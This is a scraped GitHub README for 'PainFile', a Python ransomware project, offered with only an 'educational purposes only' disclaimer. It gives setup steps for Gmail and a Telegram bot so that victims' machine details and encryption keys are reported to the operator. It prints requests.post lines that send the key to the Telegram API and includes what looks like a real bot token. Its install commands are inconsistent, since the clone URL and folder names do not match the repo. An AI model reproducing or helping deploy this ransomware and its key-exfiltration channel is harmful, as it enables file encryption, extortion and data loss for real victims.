Thanks to visit codestin.com
Credit goes to github.com

Skip to content

networkkiller/PainFile

Repository files navigation

Python Ransomware

Simple Ransomware using Python3 and Cryptography libraries. You can make the design you want using the design files.

Screenshot

YouTube Video

Getting Started

Requirements

You can install the Requirements by running the command:

pip install -r requirements.txt
certifi==2021.5.30
cffi==1.14.6
charset-normalizer==2.0.6
cryptography==35.0.0
idna==3.2
pycparser==2.20
PyQt5==5.15.4
PyQt5-Qt5==5.15.2
PyQt5-sip==12.9.0
requests==2.26.0
urllib3==1.26.7

Operating Instructions

1) Send Email

to be able to send an email

1)open your gmail account
2)go https://myaccount.google.com/
3)Activate "Less secure app access"

2) Send Telegram (api) Message

Telegram api (https://core.telegram.org/bots/api)

1)open telegram
2)search BotFather
3)/newbot
4)Choose a username for your bot (ransom0wareusername_bot)

Use this token to access the HTTP API:
3416572059:AAGB7p9WAe0jWamE89ftR02MR2WgbxlLZEg

Chat Id

1)search Json Dump Bot
2)/start
3)telegramapi

"from": {
    "id": 3213112048, your chat_id

Send Message Example:

    requests.post("https://api.telegram.org/bot<your_telegram_api>g/sendMessage",
            data={"chat_id": "<your_telegram_chat_id>", "text": f"Node: {node} Release: {release} \nKey: {str(key)}"})

    requests.post("https://api.telegram.org/bot<your_telegram_api>/sendMessage",
            data={"chat_id": "<your_telegram_chat_id>", "text": f"Node: {node} Release: {release} \nKey: {str(key)}"})

Installation

$ git clone https://github.com/networkkiller/killfile
$ cd python_ransomware
$ pip install -r requirements.txt
$ cd Encrypt
$ python3 encrypt.py
$ cd Decrypt
$ python3 decrypt.py

Attention ⚠️

These scripts contain stuff that can get you in trouble. This is for educational purposes only. Do not abuse.

view Me Youtube ☕

"follow me for more"

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Packages

No packages published

Languages